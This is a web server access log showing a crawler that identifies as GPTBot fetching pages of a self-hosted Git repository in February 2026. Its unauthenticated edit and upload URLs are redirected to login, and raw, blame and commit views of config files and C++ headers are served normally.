- GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/assets" +[17/Feb/2026:15:58:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/App.tsx" +[17/Feb/2026:15:58:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/App.tsx" +[17/Feb/2026:15:58:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/vite.config.ts" +[17/Feb/2026:15:58:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/vite.config.ts" +[17/Feb/2026:15:58:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/App.tsx" +[17/Feb/2026:15:58:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/App.tsx" +[17/Feb/2026:15:58:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" +[17/Feb/2026:15:58:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/README.md" +[17/Feb/2026:15:58:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/README.md" +[17/Feb/2026:15:58:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/README.md" +[17/Feb/2026:15:58:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/types.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/types.ts" +[17/Feb/2026:15:58:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/types.ts" +[17/Feb/2026:15:58:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/.Backup/html/components" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components" +[17/Feb/2026:15:58:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/.Backup/html/components" +[17/Feb/2026:15:58:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/.gitignore" +[17/Feb/2026:15:58:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/.gitignore" +[17/Feb/2026:15:58:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/types.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/types.ts" +[17/Feb/2026:15:58:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/types.ts" +[17/Feb/2026:15:58:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/services" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/services" +[17/Feb/2026:15:58:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/services" +[17/Feb/2026:15:58:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/types.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/types.ts" +[17/Feb/2026:15:58:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/types.ts" +[17/Feb/2026:15:58:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/.gitignore" +[17/Feb/2026:15:58:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/.gitignore" +[17/Feb/2026:15:58:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/.gitignore" +[17/Feb/2026:15:58:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/.gitignore" +[17/Feb/2026:15:58:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html" [Client 74.7.227.38] [Length 10018] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" +[17/Feb/2026:15:58:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/components" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components" +[17/Feb/2026:15:58:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/components" +[17/Feb/2026:15:58:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/.Backup/html/assets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets" +[17/Feb/2026:15:58:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/.Backup/html/assets" +[17/Feb/2026:15:58:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/status.json" [Client 74.7.227.38] [Length 11324] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" +[17/Feb/2026:15:58:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 12106] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" +[17/Feb/2026:15:58:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/package.json" [Client 74.7.227.38] [Length 11949] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" +[17/Feb/2026:15:58:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 11528] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" +[17/Feb/2026:15:58:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:15:58:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:15:58:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10191] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:58:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10194] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:58:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12019] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:58:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 12707] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:58:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 12946] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:58:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/status.json" +[17/Feb/2026:15:58:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/status.json" [Client 74.7.227.38] [Length 1354] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/status.json" +[17/Feb/2026:15:58:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 828] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/tsconfig.json" +[17/Feb/2026:15:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/metadata.json" +[17/Feb/2026:15:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 10644] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/metadata.json" +[17/Feb/2026:15:58:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/tsconfig.json" +[17/Feb/2026:15:58:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/package.json" +[17/Feb/2026:15:58:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/package.json" [Client 74.7.227.38] [Length 826] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/package.json" +[17/Feb/2026:15:58:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11444] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/tsconfig.json" +[17/Feb/2026:15:58:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 9781] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/tsconfig.json" +[17/Feb/2026:15:58:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 12636] [Gzip 6.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:15:58:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:15:58:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/status.json" [Client 74.7.227.38] [Length 10644] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/status.json" +[17/Feb/2026:15:58:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/package.json" [Client 74.7.227.38] [Length 11270] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/package.json" +[17/Feb/2026:15:58:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 828] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/metadata.json" +[17/Feb/2026:15:58:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/status.json" [Client 74.7.227.38] [Length 10052] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/status.json" +[17/Feb/2026:15:58:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/package.json" [Client 74.7.227.38] [Length 9778] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/package.json" +[17/Feb/2026:15:58:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 9785] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/metadata.json" +[17/Feb/2026:15:58:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 10243] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:15:58:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:58:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 11900] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/controller.hpp" 